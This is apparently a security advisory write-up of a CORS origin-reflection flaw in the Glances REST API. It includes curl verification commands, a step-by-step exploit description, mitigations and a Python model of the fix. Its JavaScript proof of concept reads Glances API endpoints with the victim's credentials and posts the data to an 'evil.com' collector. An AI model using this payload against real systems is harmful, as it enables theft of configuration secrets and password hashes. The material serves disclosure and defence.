How CVE-2026-32610 Works
The Glances REST API web server, prior to version 4.5.2, ships with a default CORS (Cross-Origin Resource Sharing) configuration that sets `allow_origins=["*"]` combined with `allow_credentials=True`. According to the CORS specification, browsers must reject credentialed responses that include both `Access-Control-Allow-Origin: *` and `Access-Control-Allow-Credentials: true`; this combination is explicitly forbidden because it would allow any website to make authenticated cross-origin requests.
However, Starlette's `CORSMiddleware` implements a workaround: when `allow_origins=["*"]` and `allow_credentials=True`, instead of returning the literal `*` wildcard, the middleware reflects the requesting `Origin` header value back in the `Access-Control-Allow-Origin` response header. This means the server echoes whatever origin the attacker provides, while simultaneously sending `Access-Control-Allow-Credentials: true`.
The issue manifests as follows:
- An attacker hosts a malicious page on `https://evil.com`.
- A victim who has an active authenticated session with a Glances instance (via browser Basic Auth or other cookie-based authentication) visits the attacker's page.
- The malicious JavaScript executes a `fetch()` request to the Glances API endpoint (e.g., `http://glances-server:61208/api/4/config`) with `credentials: "include"`.
- The browser automatically attaches the stored credentials (Basic Auth headers, cookies, etc.) to the request.
- Starlette's `CORSMiddleware` sees the request `Origin: https://evil.com` and responds with:
  - `Access-Control-Allow-Origin: https://evil.com`
  - `Access-Control-Allow-Credentials: true`
- The browser, seeing that the reflected origin matches the requesting page's origin and that credentials are allowed, permits JavaScript to read the full response body.
- The attacker exfiltrates sensitive data such as system monitoring information, configuration secrets, command-line arguments (which may contain passwords and API keys), and more.
The preflight (OPTIONS) request for non-simple requests also echoes the requested headers back, approving credentialed requests for methods like POST and custom headers. When Glances runs without the `--password` flag (the default for most internal network deployments), no authentication is required at all, so any website can read all API endpoints directly.
DailyCVE Form
| Field | Value |
|-|-|
| Platform | Glances REST API (Starlette CORSMiddleware) |
| Version | < 4.5.2 |
| Vulnerability | CORS origin reflection with credentials |
| Severity | High (CVSS 8.1) |
| Date | 2026-03-18 |
| Prediction | Already patched in v4.5.2 (2026-03-14) |
What Undercode Say
Analytics & Verification Commands
# Start Glances web server (default, no password)
glances -w

# Verify CORS headers from a malicious origin
curl -s -D- -o /dev/null \
  -H "Origin: https://evil.com" \
  http://localhost:61208/api/4/all
# Expected response headers:
#   Access-Control-Allow-Origin: https://evil.com
#   Access-Control-Allow-Credentials: true

# Verify data theft without authentication
curl -s http://localhost:61208/api/4/all | python -m json.tool | head -20
curl -s http://localhost:61208/api/4/config | python -m json.tool
curl -s http://localhost:61208/api/4/args | python -m json.tool

# With authentication enabled, verify credentialed requests work
glances -w --password
curl -s -D- -o /dev/null \
  -X OPTIONS \
  -H "Origin: https://evil.com" \
  -H "Access-Control-Request-Method: GET" \
  -H "Access-Control-Request-Headers: Authorization" \
  http://localhost:61208/api/4/all
# Expected: Access-Control-Allow-Origin: https://evil.com
# Expected: Access-Control-Allow-Credentials: true
Proof-of-Concept (JavaScript)
<!-- steal-glances.html hosted on attacker's server -->
<script>
async function steal() {
const target = "http://glances-server:61208";
// Steal system stats (processes, CPU, memory, network, disk)
const all = await fetch(target + "/api/4/all", { credentials: "include" });
const allData = await all.json();
// Steal configuration (may contain database passwords, API keys)
const config = await fetch(target + "/api/4/config", { credentials: "include" });
const configData = await config.json();
// Steal command line args (contains password hash, SNMP creds)
const args = await fetch(target + "/api/4/args", { credentials: "include" });
const argsData = await args.json();
// Exfiltrate to attacker
fetch("https://evil.com/collect", {
method: "POST",
body: JSON.stringify({ all: allData, config: configData, args: argsData })
});
}
steal();
</script>
Exploit
An attacker can exploit this vulnerability in four simple steps:
1. Host a malicious page on a domain they control (e.g., `https://evil.com/steal.html`).
2. Lure a victim who has an active authenticated session with a Glances instance to visit that page. The victim may have authenticated via the browser's Basic Auth dialog (which caches credentials) or via cookies.
3. Execute cross-origin requests from the malicious page to the Glances API endpoints using `fetch()` with `credentials: "include"`. The browser automatically attaches the stored credentials.
4. Exfiltrate the response data — the server reflects the attacker's origin in `Access-Control-Allow-Origin` and allows credentials, so the browser grants full read access to the response. The attacker can then steal system stats, configuration files, command-line arguments, and even perform state-changing operations like clearing event logs or modifying process monitoring.
With Glances running without `--password` (the default), no authentication is required, making the attack trivial — any website visited by a user on the same network can silently read all API endpoints.
<h2 style="color: blue;">Protection</h2>
To mitigate this vulnerability, apply one of the following fixes:
1. Upgrade to Glances version 4.5.2 or later, which addresses this issue.
2. Change the default CORS credentials setting to `False` in `glances/outputs/glances_restful_api.py`:
   cors_credentials = config.get_bool_value('outputs', 'cors_credentials', default=False)  # Changed from True
3. When credentials are required, configure explicit allowed origins instead of using the wildcard:
   cors_origins = config.get_list_value('outputs', 'cors_origins', default=["https://trusted-domain.com"])
4. Reject the insecure combination at startup by warning and forcing `cors_credentials = False` when `cors_origins == ["*"]`.
5. Restrict allowed methods to only those necessary (e.g., `["GET"]` instead of `["*"]`).
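To make the origin-reflection mechanism from "How CVE-2026-32610 Works" and the startup check in mitigation 4 concrete, here is an added stand-alone model (not Glances or Starlette code; a deliberately simplified imitation of the middleware behaviour described above). `CorsConfig`, `cors_response_headers`, `harden_at_startup` and `credentialed_read_allowed` are hypothetical names; the hardened variant uses the explicit allowlist from mitigation 3.

```python
import warnings
from dataclasses import dataclass, field
from typing import Dict, List, Optional


@dataclass
class CorsConfig:
    # Defaults mirror the vulnerable pre-4.5.2 shape described in the advisory
    allow_origins: List[str] = field(default_factory=lambda: ["*"])
    allow_credentials: bool = True


def is_insecure_combination(cfg: CorsConfig) -> bool:
    """Wildcard origin combined with credentials: the combination the advisory describes."""
    return "*" in cfg.allow_origins and cfg.allow_credentials


def harden_at_startup(cfg: CorsConfig) -> CorsConfig:
    """Mitigation 4: warn and force credentials off when the wildcard origin is in use."""
    if is_insecure_combination(cfg):
        warnings.warn("cors_origins=['*'] with cors_credentials=True; forcing cors_credentials=False")
        cfg.allow_credentials = False
    return cfg


def cors_response_headers(cfg: CorsConfig, origin: Optional[str]) -> Dict[str, str]:
    """Simplified model of the CORS headers a Starlette-style middleware adds to a GET response:
    with a wildcard origin and credentials enabled, the request's Origin is echoed instead of '*'."""
    headers: Dict[str, str] = {}
    if origin is None:
        return headers  # no Origin header: same-origin or non-browser client, nothing to add
    if "*" in cfg.allow_origins:
        if cfg.allow_credentials:
            headers["Access-Control-Allow-Origin"] = origin  # origin reflection (the bug)
            headers["Access-Control-Allow-Credentials"] = "true"
        else:
            headers["Access-Control-Allow-Origin"] = "*"
    elif origin in cfg.allow_origins:
        headers["Access-Control-Allow-Origin"] = origin  # explicit allowlist match
        headers["Vary"] = "Origin"
        if cfg.allow_credentials:
            headers["Access-Control-Allow-Credentials"] = "true"
    return headers


def credentialed_read_allowed(headers: Dict[str, str], page_origin: str) -> bool:
    """Would a browser let page_origin's script read the response to a credentials: "include" fetch()?"""
    # For credentialed requests a literal '*' never matches; the exact origin plus the credentials header is required
    return (headers.get("Access-Control-Allow-Origin") == page_origin
            and headers.get("Access-Control-Allow-Credentials") == "true")
```

Running the model with the default config against `Origin: https://evil.com` reproduces the two reflected headers shown in the curl output above; after `harden_at_startup` or with an explicit allowlist, the evil origin gets no readable credentialed response.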
<h2 style="color: blue;">Impact</h2>
- Without `--password` (default): Any website visited by a user on the same network can silently read all Glances API endpoints, including complete system monitoring data (process list with command lines, CPU/memory/disk stats, network interfaces, filesystem mounts, Docker container info), configuration file contents (which may contain database passwords, export backend credentials, API keys), and command-line arguments.
- With `--password`: If the user has previously authenticated via the browser's Basic Auth dialog (which caches credentials), any website can make cross-origin requests that carry those cached credentials. This allows exfiltration of all the above data plus the password hash itself (via `/api/4/args`).
- Network reconnaissance: An attacker can use this to map internal network infrastructure by having victims visit a page that probes common Glances ports (61208) on internal IPs.
- State-changing attacks: The CORS policy also allows POST methods, enabling an attacker to clear event logs (`/api/4/events/clear/all`) or modify process monitoring (`/api/4/processes/extended/{pid}`).
- CVSS Score: 8.1 (High). Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N.
Sources:
Reported By: github.com